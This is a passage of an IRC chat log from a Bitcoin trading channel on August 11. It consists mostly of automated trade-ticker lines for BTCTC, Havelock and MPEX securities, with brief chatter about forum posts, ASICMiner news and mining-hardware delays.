0.0336 BTC [+] Aug 11 17:29:12 [BTCTC] [TAT.ASICMINER] 14 @ 0.03814 = 0.534 BTC [+] Aug 11 17:29:33 Hailong bought his donator status later than 30th july Aug 11 17:30:18 [BTCTC] [DMS.PURCHASE] 145 @ 0.02811 = 4.076 BTC [-] Aug 11 17:30:36 his sig says "The best way to predict the future is to invent it.~Alan Kay:" Aug 11 17:30:39 if it works for active mining why not labmining. if labmining why not myminer peminer blablaminer etfc. Aug 11 17:31:04 when you got nothing you're not really doing well : anyone else can compete. Aug 11 17:31:09 there's an abundance of nothing available. Aug 11 17:31:10 probably now what Kay meant Aug 11 17:31:13 not* Aug 11 17:31:20 [BTCTC] [DMS.SELLING] 50 @ 0.02449 = 1.2245 BTC [-] Aug 11 17:31:28 ThickAsThieves well he didn't say "fabulate it" Aug 11 17:31:32 [BTCTC] [DMS.SELLING] 1 @ 0.02449 BTC [-] Aug 11 17:32:37 [HAVELOCK] [XBOND] 215 @ 0.0010419 = 0.224 BTC [-] Aug 11 17:33:35 [BTCTC] [LABCOIN] 30 @ 0.001328 = 0.0398 BTC [-] Aug 11 17:33:37 [BTCTC] [LABCOIN] 20 @ 0.001324 = 0.0265 BTC [-] Aug 11 17:34:22 https://bitcointalk.org/index.php?topic=261235.msg2904540#msg2904540 Aug 11 17:34:26 SEC Charges Bitcoin Savings and Trust (BTCST) as Ponzi Scheme Aug 11 17:34:31 mpoe-pr got a fan Aug 11 17:34:36 the whole world's come undone Aug 11 17:35:27 from lookin' straight at the sun Aug 11 17:41:17 [HAVELOCK] [XBOND] 20 @ 0.001043 = 0.0209 BTC [+] Aug 11 17:41:20 [HAVELOCK] [XBOND] 100 @ 0.00104231 = 0.1042 BTC [-] Aug 11 17:41:21 [HAVELOCK] [XBOND] 121 @ 0.0010423 = 0.1261 BTC [-] Aug 11 17:42:38 [BTCTC] [BTCGARDEN] 1 @ 0.01596 BTC [+] Aug 11 17:44:02 [HAVELOCK] [XBOND] 20 @ 0.00104231 = 0.0208 BTC [+] Aug 11 17:44:04 [HAVELOCK] [XBOND] 34 @ 0.00104103 = 0.0354 BTC [-] Aug 11 17:44:07 [HAVELOCK] [XBOND] 218 @ 0.0010342 = 0.2255 BTC [-] Aug 11 17:44:09 [HAVELOCK] [XBOND] 218 @ 0.0010341 = 0.2254 BTC [-] Aug 11 17:44:11 [HAVELOCK] [XBOND] 10 @ 0.0010341 = 0.0103 BTC [-] Aug 11 17:45:55 http://ph.news.yahoo.com/depth-getting-bitcoin-hands-china-100043020.html Aug 11 17:46:29 again with the average zhou ? Aug 11 17:46:51 fucking communism permeating everything in the English world already. Aug 11 17:48:29 the guy in the picture is the one from asic-me Aug 11 17:49:54 aha ? Aug 11 17:49:58 what's his name again ? Aug 11 17:50:26 Yaorui Yang Aug 11 17:50:38 alleged co-founder of renren.com Aug 11 17:52:26 [HAVELOCK] [SMG] 53 @ 0.0002098 = 0.0111 BTC [+] Aug 11 17:52:35 [HAVELOCK] [SMG] 580 @ 0.0002016 = 0.1169 BTC [-] Aug 11 17:52:38 [HAVELOCK] [XBOND] 229 @ 0.0010419 = 0.2386 BTC [+] Aug 11 17:52:44 [HAVELOCK] [SMG] 4389 @ 0.0002015 = 0.8844 BTC [-] Aug 11 17:52:59 [HAVELOCK] [SMG] 40 @ 0.0002005 = 0.008 BTC [-] Aug 11 17:53:09 i c. Aug 11 17:53:12 [HAVELOCK] [SMG] 300 @ 0.0002 = 0.06 BTC [-] Aug 11 17:53:34 [HAVELOCK] [SMG] 700 @ 0.0002 = 0.14 BTC [-] Aug 11 17:53:58 Founder(s) Wang Xing, Wang Huiwen, Lai Binqiang Aug 11 17:54:00 seems not. Aug 11 17:54:19 is he some sort of chinese winklevoss wannabe ? Aug 11 17:55:21 [HAVELOCK] [XBOND] 229 @ 0.0010419 = 0.2386 BTC [+] Aug 11 17:57:14 [BTCTC] [BTCGARDEN] 9 @ 0.01596 = 0.1436 BTC [+] Aug 11 17:57:19 [HAVELOCK] [XBOND] 109 @ 0.0010419 = 0.1136 BTC [+] Aug 11 17:58:16 [BTCTC] [BTCGARDEN] 1 @ 0.01596 BTC [+] Aug 11 17:59:50 [BTCTC] [DMS.MINING] 1 @ 0.004225 BTC [+] Aug 11 18:00:48 [BTCTC] [LABCOIN] 2 @ 0.001344 = 0.0027 BTC [+] Aug 11 18:00:52 [BTCTC] [ACTIVEMINING] 30 @ 0.00543 = 0.1629 BTC [-] Aug 11 18:00:54 [HAVELOCK] [SMG] 733 @ 0.0001992 = 0.146 BTC [-] Aug 11 18:01:02 [HAVELOCK] [SMG] 733 @ 0.0001992 = 0.146 BTC [-] Aug 11 18:01:17 [HAVELOCK] [SMG] 751 @ 0.0001993 = 0.1497 BTC [+] Aug 11 18:01:23 [HAVELOCK] [SMG] 733 @ 0.0001992 = 0.146 BTC [-] Aug 11 18:01:36 [HAVELOCK] [SMG] 988 @ 0.000199 = 0.1966 BTC [-] Aug 11 18:02:15 [BTCTC] [LABCOIN] 2 @ 0.001344 = 0.0027 BTC [+] Aug 11 18:03:03 [HAVELOCK] [AM100] 15 @ 0.0365 = 0.5475 BTC [-] Aug 11 18:04:02 [HAVELOCK] [XBOND] 225 @ 0.001047 = 0.2356 BTC [+] Aug 11 18:04:05 [HAVELOCK] [XBOND] 20 @ 0.0010469 = 0.0209 BTC [-] Aug 11 18:04:14 [BTCTC] [LABCOIN] 2 @ 0.001344 = 0.0027 BTC [+] Aug 11 18:04:51 yea Aug 11 18:05:31 [BTCTC] [LABCOIN] 30 @ 0.001348 = 0.0404 BTC [+] Aug 11 18:05:32 [BTCTC] [LABCOIN] 25 @ 0.001349 = 0.0337 BTC [+] Aug 11 18:05:33 [BTCTC] [LABCOIN] 200 @ 0.00135 = 0.27 BTC [+] Aug 11 18:05:35 [BTCTC] [LABCOIN] 50 @ 0.001351 = 0.0676 BTC [+] Aug 11 18:05:35 [BTCTC] [LABCOIN] 400 @ 0.001352 = 0.5408 BTC [+] Aug 11 18:05:36 [BTCTC] [LABCOIN] 75 @ 0.001357 = 0.1018 BTC [+] Aug 11 18:05:37 [BTCTC] [LABCOIN] 600 @ 0.001358 = 0.8148 BTC [+] Aug 11 18:05:38 [BTCTC] [LABCOIN] 5 @ 0.001362 = 0.0068 BTC [+] Aug 11 18:05:39 [BTCTC] [LABCOIN] 40 @ 0.001363 = 0.0545 BTC [+] Aug 11 18:05:40 [BTCTC] [LABCOIN] 47 @ 0.001364 = 0.0641 BTC [+] Aug 11 18:05:41 [BTCTC] [LABCOIN] 300 @ 0.001365 = 0.4095 BTC [+] Aug 11 18:05:42 [BTCTC] [LABCOIN] 80 @ 0.001365 = 0.1092 BTC [+] Aug 11 18:05:43 [BTCTC] [LABCOIN] 88 @ 0.001369 = 0.1205 BTC [+] Aug 11 18:05:44 [BTCTC] [LABCOIN] 400 @ 0.00137 = 0.548 BTC [+] Aug 11 18:05:45 [BTCTC] [LABCOIN] 300 @ 0.00137 = 0.411 BTC [+] Aug 11 18:05:45 [BTCTC] [LABCOIN] 40 @ 0.001371 = 0.0548 BTC [+] Aug 11 18:05:46 [BTCTC] [LABCOIN] 31 @ 0.001371 = 0.0425 BTC [+] Aug 11 18:05:48 [BTCTC] [LABCOIN] 249 @ 0.001372 = 0.3416 BTC [+] Aug 11 18:05:49 [BTCTC] [LABCOIN] 95 @ 0.001373 = 0.1304 BTC [+] Aug 11 18:05:50 [BTCTC] [LABCOIN] 764 @ 0.001374 = 1.0497 BTC [+] Aug 11 18:05:51 [BTCTC] [LABCOIN] 41 @ 0.001387 = 0.0569 BTC [+] Aug 11 18:05:52 [BTCTC] [LABCOIN] 80 @ 0.001388 = 0.111 BTC [+] Aug 11 18:05:53 [BTCTC] [LABCOIN] 75 @ 0.001389 = 0.1042 BTC [+] Aug 11 18:05:54 [BTCTC] [LABCOIN] 180 @ 0.001389 = 0.25 BTC [+] Aug 11 18:05:54 [BTCTC] [LABCOIN] 231 @ 0.001394 = 0.322 BTC [+] Aug 11 18:05:55 [BTCTC] [LABCOIN] 1000 @ 0.001395 = 1.395 BTC [+] Aug 11 18:05:56 [BTCTC] [LABCOIN] 854 @ 0.001396 = 1.1922 BTC [+] Aug 11 18:05:57 [BTCTC] [LABCOIN] 202 @ 0.001397 = 0.2822 BTC [+] Aug 11 18:05:58 [BTCTC] [LABCOIN] 60 @ 0.001398 = 0.0839 BTC [+] Aug 11 18:05:59 [BTCTC] [LABCOIN] 1563 @ 0.001398 = 2.1851 BTC [+] Aug 11 18:06:51 [BTCTC] [DMS.PURCHASE] 100 @ 0.02811 = 2.811 BTC [-] Aug 11 18:08:23 [BTCTC] [ACTIVEMINING] 30 @ 0.005531 = 0.1659 BTC [+] Aug 11 18:08:27 [HAVELOCK] [XBOND] 205 @ 0.0010418 = 0.2136 BTC [-] Aug 11 18:08:40 [BTCTC] [ASICMINER-PT] 1 @ 3.85 BTC [-] Aug 11 18:08:42 [BTCTC] [ASICMINER-PT] 3 @ 3.84 = 11.52 BTC [-] Aug 11 18:08:42 [BTCTC] [ASICMINER-PT] 4 @ 3.835 = 15.34 BTC [-] Aug 11 18:08:43 [BTCTC] [ASICMINER-PT] 2 @ 3.825 = 7.65 BTC [-] Aug 11 18:08:50 wow odd Aug 11 18:08:57 almost more chinese than english in the thread Aug 11 18:11:35 [BTCTC] [DMS.SELLING] 449 @ 0.02449 = 10.996 BTC [-] Aug 11 18:11:36 [BTCTC] [DMS.SELLING] 824 @ 0.0245 = 20.188 BTC [+] Aug 11 18:11:38 [BTCTC] [DMS.SELLING] 50 @ 0.0245 = 1.225 BTC [+] Aug 11 18:13:02 [HAVELOCK] [XBOND] 225 @ 0.001047 = 0.2356 BTC [+] Aug 11 18:13:05 [HAVELOCK] [XBOND] 50 @ 0.0010469 = 0.0523 BTC [-] Aug 11 18:13:28 [HAVELOCK] [XBOND] 20 @ 0.0010469 = 0.0209 BTC [-] Aug 11 18:15:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.03801 = 0.152 BTC [-] Aug 11 18:15:48 [BTCTC] [LABCOIN] 235 @ 0.001363 = 0.3203 BTC [-] Aug 11 18:15:49 [BTCTC] [LABCOIN] 25 @ 0.001362 = 0.0341 BTC [-] Aug 11 18:16:21 [BTCTC] [DMS.PURCHASE] 200 @ 0.02811 = 5.622 BTC [-] Aug 11 18:16:53 [BTCTC] [NASTY-PT] 4 @ 0.00414 = 0.0166 BTC [+] Aug 11 18:17:27 [HAVELOCK] [XBOND] 155 @ 0.0010417 = 0.1615 BTC [-] Aug 11 18:18:38 [BTCTC] [DMS.PURCHASE] 25 @ 0.02811 = 0.7028 BTC [-] Aug 11 18:20:21 [BTCTC] [BTCGARDEN] 10 @ 0.01596 = 0.1596 BTC [+] Aug 11 18:20:50 [BTCTC] [BTCGARDEN] 5 @ 0.01597 = 0.0799 BTC [+] Aug 11 18:21:21 [BTCTC] [LABCOIN] 15 @ 0.001374 = 0.0206 BTC [+] Aug 11 18:21:22 [BTCTC] [LABCOIN] 31 @ 0.001375 = 0.0426 BTC [+] Aug 11 18:21:23 [BTCTC] [LABCOIN] 20 @ 0.001375 = 0.0275 BTC [+] Aug 11 18:22:46 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001579 BTC [+] Aug 11 18:28:02 [HAVELOCK] [XBOND] 225 @ 0.001047 = 0.2356 BTC [+] Aug 11 18:28:21 [BTCTC] [BASIC-MINING] 1 @ 0.315 BTC [+] Aug 11 18:28:21 [BTCTC] [BASIC-MINING] 1 @ 0.3153 BTC [+] Aug 11 18:28:26 [HAVELOCK] [XBOND] 1 @ 0.001047 BTC [+] Aug 11 18:29:35 [BTCTC] [ACTIVEMINING] 10 @ 0.005478 = 0.0548 BTC [-] Aug 11 18:29:46 [BTCTC] [DMS.PURCHASE] 285 @ 0.02811 = 8.0114 BTC [-] Aug 11 18:31:19 [HAVELOCK] [XBOND] 225 @ 0.0010417 = 0.2344 BTC [-] Aug 11 18:31:46 [BTCTC] [DMS.MINING] 1 @ 0.004225 BTC [+] Aug 11 18:32:49 [HAVELOCK] [XBOND] 1 @ 0.00104696 BTC [+] Aug 11 18:33:00 [HAVELOCK] [XBOND] 1 @ 0.00104695 BTC [-] Aug 11 18:33:11 [HAVELOCK] [XBOND] 1 @ 0.00104694 BTC [-] Aug 11 18:33:33 [BTCTC] [ASICMINER-PT] 1 @ 3.86 BTC [+] Aug 11 18:34:36 [HAVELOCK] [XBOND] 1 @ 0.00104694 BTC [-] Aug 11 18:34:43 [HAVELOCK] [XBOND] 1 @ 0.00104693 BTC [-] Aug 11 18:36:01 [BTCTC] [BASIC-MINING] 1 @ 0.3152 BTC [-] Aug 11 18:36:24 "August 10th is today (yesterday should now be regarded as a). But our ME20 and ME80 does not debug well, indeed, there are still problems, ..." Aug 11 18:36:38 ? Aug 11 18:36:42 [BTCTC] [LABCOIN] 3 @ 0.001382 = 0.0041 BTC [+] Aug 11 18:37:00 from the guys running https://bitcointalk.org/index.php?topic=271771.msg2910977#new Aug 11 18:38:03 [BTCTC] [LABCOIN] 25 @ 0.001383 = 0.0346 BTC [+] Aug 11 18:42:42 [BTCTC] [DMS.MINING] 3 @ 0.00422 = 0.0127 BTC [-] Aug 11 18:42:57 [BTCTC] [DMS.MINING] 17 @ 0.00422 = 0.0717 BTC [-] Aug 11 18:42:59 [BTCTC] [DMS.MINING] 133 @ 0.004221 = 0.5614 BTC [+] Aug 11 18:43:56 [BTCTC] [LABCOIN] 23 @ 0.001389 = 0.0319 BTC [+] Aug 11 18:44:51 [BTCTC] [DMS.PURCHASE] 100 @ 0.02811 = 2.811 BTC [-] Aug 11 18:47:21 [BTCTC] [LABCOIN] 7 @ 0.001371 = 0.0096 BTC [-] Aug 11 18:49:09 [BTCTC] [LABCOIN] 30 @ 0.001371 = 0.0411 BTC [-] Aug 11 18:49:10 [BTCTC] [LABCOIN] 3000 @ 0.00137 = 4.11 BTC [-] Aug 11 18:50:08 [HAVELOCK] [XBOND] 1 @ 0.00104692 BTC [-] Aug 11 18:50:10 [HAVELOCK] [XBOND] 215 @ 0.001047 = 0.2251 BTC [+] Aug 11 18:50:12 [HAVELOCK] [XBOND] 1 @ 0.0010469 BTC [-] Aug 11 18:50:14 [HAVELOCK] [XBOND] 9 @ 0.0010469 = 0.0094 BTC [-] Aug 11 18:51:17 [BTCTC] [LABCOIN] 30 @ 0.001363 = 0.0409 BTC [-] Aug 11 18:51:19 [BTCTC] [LABCOIN] 42 @ 0.001362 = 0.0572 BTC [-] Aug 11 18:51:28 [BTCTC] [ASICMINER-PT] 2 @ 3.878 = 7.756 BTC [+] Aug 11 18:52:07 [BTCTC] [DMS.MINING] 2 @ 0.004209 = 0.0084 BTC [-] Aug 11 18:52:16 [BTCTC] [ASICMINER-PT] 1 @ 3.878 BTC [+] Aug 11 18:54:28 [HAVELOCK] [XBOND] 206 @ 0.0010417 = 0.2146 BTC [-] Aug 11 18:55:26 [BTCTC] [TAT.ASICMINER] 4 @ 0.03796 = 0.1518 BTC [-] Aug 11 18:55:38 [MPEX] [S.MPOE] 12298 @ 0.00082041 = 10.0894 BTC [-] Aug 11 18:59:42 [BTCTC] [DMS.MINING] 5 @ 0.004198 = 0.021 BTC [-] Aug 11 19:02:42 [BTCTC] [BTC-BOND] 13 @ 0.009999 = 0.13 BTC [+] Aug 11 19:03:14 [BTCTC] [DMS.MINING] 2 @ 0.004193 = 0.0084 BTC [-] Aug 11 19:03:38 [BTCTC] [DMS.PURCHASE] 88 @ 0.0282 = 2.4816 BTC [+] Aug 11 19:06:41 [BTCTC] [DMS.PURCHASE] 57 @ 0.02806 = 1.5994 BTC [-] Aug 11 19:07:04 [HAVELOCK] [XBOND] 216 @ 0.001047 = 0.2262 BTC [+] Aug 11 19:07:07 [BTCTC] [DMS.PURCHASE] 1 @ 0.02806 BTC [-] Aug 11 19:07:08 [HAVELOCK] [XBOND] 1 @ 0.0010469 BTC [-] Aug 11 19:07:10 [HAVELOCK] [XBOND] 9 @ 0.0010469 = 0.0094 BTC [-] Aug 11 19:09:10 [BTCTC] [ASICMINER-PT] 1 @ 3.877 BTC [-] Aug 11 19:09:12 [BTCTC] [ASICMINER-PT] 1 @ 3.878 BTC [+] Aug 11 19:09:19 [HAVELOCK] [XBOND] 206 @ 0.0010417 = 0.2146 BTC [-] Aug 11 19:10:04 [BTCTC] [ASICMINER-PT] 2 @ 3.878 = 7.756 BTC [+] Aug 11 19:10:44 [BTCTC] [ACTIVEMINING] 10 @ 0.005471 = 0.0547 BTC [-] Aug 11 19:14:26 [HAVELOCK] [AM1] 2 @ 3.85 = 7.7 BTC [-] Aug 11 19:16:01 [BTCTC] [BTCGARDEN] 11 @ 0.01596 = 0.1756 BTC [-] Aug 11 19:16:03 [BTCTC] [BTCGARDEN] 5 @ 0.01597 = 0.0799 BTC [+] Aug 11 19:16:04 [BTCTC] [BTCGARDEN] 50 @ 0.01597 = 0.7985 BTC [+] Aug 11 19:16:05 [BTCTC] [BTCGARDEN] 50 @ 0.01598 = 0.799 BTC [+] Aug 11 19:16:06 [BTCTC] [BTCGARDEN] 14 @ 0.01598 = 0.2237 BTC [+] Aug 11 19:16:07 [BTCTC] [BTCGARDEN] 300 @ 0.01599 = 4.797 BTC [+] Aug 11 19:16:08 [BTCTC] [BTCGARDEN] 19 @ 0.016 = 0.304 BTC [+] Aug 11 19:16:09 [BTCTC] [BTCGARDEN] 156 @ 0.01601 = 2.4976 BTC [+] Aug 11 19:16:10 [BTCTC] [BTCGARDEN] 457 @ 0.01603 = 7.3257 BTC [+] Aug 11 19:16:11 [BTCTC] [BTCGARDEN] 2863 @ 0.01604 = 45.9225 BTC [+] Aug 11 19:16:50 [MPEX] [S.MPOE] 3950 @ 0.00081953 = 3.2371 BTC [-] Aug 11 19:17:11 [BTCTC] [ACTIVEMINING] 30 @ 0.005451 = 0.1635 BTC [-] Aug 11 19:17:12 [BTCTC] [ACTIVEMINING] 68 @ 0.005452 = 0.3707 BTC [+] Aug 11 19:17:14 [BTCTC] [ACTIVEMINING] 6 @ 0.005456 = 0.0327 BTC [+] Aug 11 19:18:44 [BTCTC] [ASICMINER-PT] 1 @ 3.822 BTC [-] Aug 11 19:18:46 [BTCTC] [ASICMINER-PT] 1 @ 3.821 BTC [-] Aug 11 19:18:47 [BTCTC] [ASICMINER-PT] 5 @ 3.787 = 18.935 BTC [-] Aug 11 19:18:48 [BTCTC] [ASICMINER-PT] 1 @ 3.786 BTC [-] Aug 11 19:22:13 [HAVELOCK] [AM100] 1 @ 0.0358 BTC [-] Aug 11 19:23:07 [HAVELOCK] [XBOND] 216 @ 0.001047 = 0.2262 BTC [+] Aug 11 19:23:13 [HAVELOCK] [XBOND] 1 @ 0.0010469 BTC [-] Aug 11 19:24:09 [BTCTC] [TAT.ASICMINER] 46 @ 0.03893 = 1.7908 BTC [+] Aug 11 19:24:21 [BTCTC] [DMS.MINING] 100 @ 0.003998 = 0.3998 BTC [-] Aug 11 19:27:59 [HAVELOCK] [XBOND] 215 @ 0.0010417 = 0.224 BTC [-] Aug 11 19:31:37 [BTCTC] [DMS.MINING] 7 @ 0.003998 = 0.028 BTC [-] Aug 11 19:33:39 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.001517 = 0.0046 BTC [-] Aug 11 19:33:40 [BTCTC] [TAT.VIRTUALMINE] 37 @ 0.001514 = 0.056 BTC [-] Aug 11 19:34:05 [BTCTC] [ACTIVEMINING] 26 @ 0.005496 = 0.1429 BTC [+] Aug 11 19:34:35 [BTCTC] [DMS.PURCHASE] 16 @ 0.02806 = 0.449 BTC [-] Aug 11 19:37:10 [BTCTC] [LABCOIN] 7 @ 0.001384 = 0.0097 BTC [+] Aug 11 19:39:43 [BTCTC] [DMS.MINING] 1 @ 0.003998 BTC [-] Aug 11 19:40:05 [BTCTC] [DMS.MINING] 3 @ 0.003999 = 0.012 BTC [+] Aug 11 19:41:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.03888 = 0.0778 BTC [-] Aug 11 19:42:58 [BTCTC] [DMS.MINING] 60 @ 0.003999 = 0.2399 BTC [+] Aug 11 19:44:06 [HAVELOCK] [XBOND] 216 @ 0.001047 = 0.2262 BTC [+] Aug 11 19:45:38 [BTCTC] [DMS.MINING] 25 @ 0.00392 = 0.098 BTC [-] Aug 11 19:46:15 [BTCTC] [DMS.MINING] 35 @ 0.00392 = 0.1372 BTC [-] Aug 11 19:46:17 [BTCTC] [DMS.MINING] 335 @ 0.00391 = 1.3099 BTC [-] Aug 11 19:46:40 [HAVELOCK] [XBOND] 216 @ 0.0010417 = 0.225 BTC [-] Aug 11 19:47:16 [BTCTC] [DMS.MINING] 35 @ 0.00391 = 0.1369 BTC [-] Aug 11 19:47:40 [BTCTC] [DMS.MINING] 45 @ 0.0039 = 0.1755 BTC [-] Aug 11 19:48:37 [BTCTC] [DMS.MINING] 12 @ 0.003999 = 0.048 BTC [+] Aug 11 19:51:23 [BTCTC] [TAT.VIRTUALMINE] 59 @ 0.001579 = 0.0932 BTC [+] Aug 11 19:51:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00158 BTC [+] Aug 11 19:51:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001601 BTC [+] Aug 11 19:51:26 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00183 BTC [+] Aug 11 19:51:27 [BTCTC] [TAT.VIRTUALMINE] 1791 @ 0.001839 = 3.2936 BTC [+] Aug 11 19:51:42 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00184 BTC [+] Aug 11 19:51:43 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.001858 = 0.3716 BTC [+] Aug 11 19:51:54 [BTCTC] [ASICMINER-PT] 1 @ 3.794 BTC [+] Aug 11 19:52:38 [BTCTC] [ACTIVEMINING] 6 @ 0.005447 = 0.0327 BTC [-] Aug 11 19:52:40 [BTCTC] [ACTIVEMINING] 1 @ 0.005448 BTC [+] Aug 11 19:52:50 [BTCTC] [TAT.VIRTUALMINE] 38 @ 0.0019 = 0.0722 BTC [+] Aug 11 19:52:50 [BTCTC] [TAT.VIRTUALMINE] 169 @ 0.0019 = 0.3211 BTC [+] Aug 11 19:52:56 [MPEX] [S.MPOE] 7554 @ 0.00082041 = 6.1974 BTC [+] Aug 11 19:52:58 [MPEX] [S.MPOE] 13446 @ 0.00082283 = 11.0638 BTC [+] Aug 11 19:55:39 [BTCTC] [RSM] 5 @ 0.008327 = 0.0416 BTC [+] Aug 11 19:57:28 [BTCTC] [DMS.MINING] 10 @ 0.0039 = 0.039 BTC [-] Aug 11 20:03:53 [BTCTC] [DMS.MINING] 10 @ 0.00392 = 0.0392 BTC [+] Aug 11 20:04:22 [BTCTC] [DMS.MINING] 10 @ 0.00393 = 0.0393 BTC [+] Aug 11 20:04:23 [MPEX] [S.MPOE] 504 @ 0.00082283 = 0.4147 BTC [+] Aug 11 20:04:25 [MPEX] [S.MPOE] 15850 @ 0.0008244 = 13.0667 BTC [+] Aug 11 20:04:26 [MPEX] [S.MPOE] 6146 @ 0.00082753 = 5.086 BTC [+] Aug 11 20:06:18 [BTCTC] [DMS.MINING] 10 @ 0.00394 = 0.0394 BTC [+] Aug 11 20:07:04 [BTCTC] [DMS.MINING] 10 @ 0.00395 = 0.0395 BTC [+] Aug 11 20:07:05 [BTCTC] [DMS.MINING] 10 @ 0.00396 = 0.0396 BTC [+] Aug 11 20:07:28 [BTCTC] [DMS.MINING] 2 @ 0.00397 = 0.0079 BTC [+] Aug 11 20:09:44 [BTCTC] [ACTIVEMINING] 3 @ 0.005449 = 0.0163 BTC [+] Aug 11 20:09:45 [BTCTC] [ACTIVEMINING] 4 @ 0.005368 = 0.0215 BTC [-] Aug 11 20:09:46 [BTCTC] [ACTIVEMINING] 1 @ 0.005365 BTC [-] Aug 11 20:09:48 [BTCTC] [ACTIVEMINING] 1 @ 0.00536 BTC [-] Aug 11 20:09:49 [BTCTC] [ACTIVEMINING] 1 @ 0.005304 BTC [-] Aug 11 20:09:50 [BTCTC] [ACTIVEMINING] 5 @ 0.005303 = 0.0265 BTC [-] Aug 11 20:12:33 [BTCTC] [DMS.PURCHASE] 20 @ 0.02806 = 0.5612 BTC [-] Aug 11 20:14:03 [BTCTC] [DMS.MINING] 44 @ 0.003969 = 0.1746 BTC [-] Aug 11 20:24:22 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0019 = 0.0057 BTC [+] Aug 11 20:24:37 [HAVELOCK] [AM100] 3 @ 0.0358 = 0.1074 BTC [-] Aug 11 20:24:55 [HAVELOCK] [AM100] 5 @ 0.03572 = 0.1786 BTC [-] Aug 11 20:25:28 [HAVELOCK] [AM100] 50 @ 0.03571 = 1.7855 BTC [-] Aug 11 20:27:15 [HAVELOCK] [AM100] 5 @ 0.03560001 = 0.178 BTC [-] Aug 11 20:28:09 [HAVELOCK] [AM100] 25 @ 0.0353001 = 0.8825 BTC [-] Aug 11 20:29:19 [HAVELOCK] [AM100] 3 @ 0.0354 = 0.1062 BTC [+] Aug 11 20:29:21 [HAVELOCK] [AM100] 10 @ 0.0352 = 0.352 BTC [-] Aug 11 20:29:24 [HAVELOCK] [AM100] 30 @ 0.03519999 = 1.056 BTC [-] Aug 11 20:29:26 [HAVELOCK] [AM100] 7 @ 0.0351001 = 0.2457 BTC [-] Aug 11 20:30:19 [BTCTC] [BFMINES] 1 @ 0.00378 BTC [+] Aug 11 20:31:15 [HAVELOCK] [AM100] 2 @ 0.0351001 = 0.0702 BTC [-] Aug 11 20:31:18 [HAVELOCK] [VTX] 1 @ 0.51 BTC [-] Aug 11 20:31:26 [HAVELOCK] [VTX] 1 @ 0.50499 BTC [-] Aug 11 20:31:33 [HAVELOCK] [VTX] 2 @ 0.500001 = 1 BTC [-] Aug 11 20:32:46 [HAVELOCK] [AM100] 108 @ 0.0351101 = 3.7919 BTC [+] Aug 11 20:32:49 [HAVELOCK] [AM100] 3 @ 0.03511 = 0.1053 BTC [-] Aug 11 20:32:51 [HAVELOCK] [AM100] 1 @ 0.03510001 BTC [-] Aug 11 20:32:53 [HAVELOCK] [AM100] 13 @ 0.035 = 0.455 BTC [-] Aug 11 20:33:53 [HAVELOCK] [AM100] 10 @ 0.0351 = 0.351 BTC [+] Aug 11 20:33:56 [HAVELOCK] [AM100] 10 @ 0.035 = 0.35 BTC [-] Aug 11 20:34:41 [MPEX] [S.MPOE] 7408 @ 0.00082753 = 6.1303 BTC [+] Aug 11 20:34:42 [MPEX] [S.MPOE] 1583 @ 0.00082854 = 1.3116 BTC [+] Aug 11 20:34:44 [MPEX] [S.MPOE] 4761 @ 0.00082906 = 3.9472 BTC [+] Aug 11 20:34:45 [BTCTC] [DMS.SELLING] 8 @ 0.02479 = 0.1983 BTC [+] Aug 11 20:38:02 [HAVELOCK] [AM100] 1 @ 0.0350001 BTC [+] Aug 11 20:38:33 [HAVELOCK] [VTX] 5 @ 0.49 = 2.45 BTC [-] Aug 11 20:39:05 [HAVELOCK] [AM100] 8 @ 0.0350001 = 0.28 BTC [+] Aug 11 20:40:45 [HAVELOCK] [AM100] 1 @ 0.03508 BTC [+] Aug 11 20:40:48 [HAVELOCK] [AM100] 9 @ 0.0350899 = 0.3158 BTC [+] Aug 11 20:40:57 [HAVELOCK] [AM100] 98 @ 0.0350899 = 3.4388 BTC [+] Aug 11 20:41:00 [HAVELOCK] [AM100] 10 @ 0.03509 = 0.3509 BTC [+] Aug 11 20:41:02 [HAVELOCK] [AM100] 2 @ 0.0350899 = 0.0702 BTC [-] Aug 11 20:41:08 [HAVELOCK] [AM100] 75 @ 0.0350899 = 2.6317 BTC [-] Aug 11 20:41:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.0389 BTC [+] Aug 11 20:41:56 [HAVELOCK] [AM100] 94 @ 0.03509 = 3.2985 BTC [+] Aug 11 20:43:06 [HAVELOCK] [AM100] 2 @ 0.0350899 = 0.0702 BTC [-] Aug 11 20:43:30 [HAVELOCK] [AM100] 25 @ 0.0349002 = 0.8725 BTC [-] Aug 11 20:44:10 [HAVELOCK] [AM100] 1 @ 0.03490011 BTC [-] Aug 11 20:44:37 [HAVELOCK] [AM100] 108 @ 0.0349999 = 3.78 BTC [+] Aug 11 20:46:11 [HAVELOCK] [AM100] 4 @ 0.03490011 = 0.1396 BTC [-] Aug 11 20:46:14 [HAVELOCK] [AM100] 6 @ 0.035 = 0.21 BTC [+] Aug 11 20:46:34 [BTCTC] [BTCGARDEN] 1 @ 0.01599 BTC [-] Aug 11 20:46:46 [HAVELOCK] [AM100] 100 @ 0.03480002 = 3.48 BTC [-] Aug 11 20:46:48 [HAVELOCK] [AM100] 3 @ 0.0346 = 0.1038 BTC [-] Aug 11 20:46:51 [HAVELOCK] [AM100] 3 @ 0.0346 = 0.1038 BTC [-] Aug 11 20:46:53 [HAVELOCK] [AM100] 94 @ 0.0343001 = 3.2242 BTC [-] Aug 11 20:46:55 [MPEX] [S.MPOE] 4739 @ 0.00082906 = 3.9289 BTC [+] Aug 11 20:47:22 [BTCTC] [BTCGARDEN] 17 @ 0.01599 = 0.2718 BTC [-] Aug 11 20:47:24 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 11 20:47:25 [BTCTC] [BTCGARDEN] 147 @ 0.016 = 2.352 BTC [+] Aug 11 20:48:02 [HAVELOCK] [AM100] 10 @ 0.0343 = 0.343 BTC [-] Aug 11 20:48:05 [HAVELOCK] [XBOND] 2 @ 0.00104699 = 0.0021 BTC [+] Aug 11 20:48:33 [BTCTC] [DMS.MINING] 10 @ 0.00386 = 0.0386 BTC [-] Aug 11 20:48:35 [BTCTC] [DMS.MINING] 50 @ 0.00385 = 0.1925 BTC [-] 